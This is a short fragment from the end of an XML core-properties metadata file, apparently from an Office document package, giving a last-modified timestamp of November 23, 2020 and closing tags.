  <dcterms:modified xsi:type="dcterms:W3CDTF">2020-11-23T00:38:57Z</dcterms:modified>
</cp:coreProperties>
</file>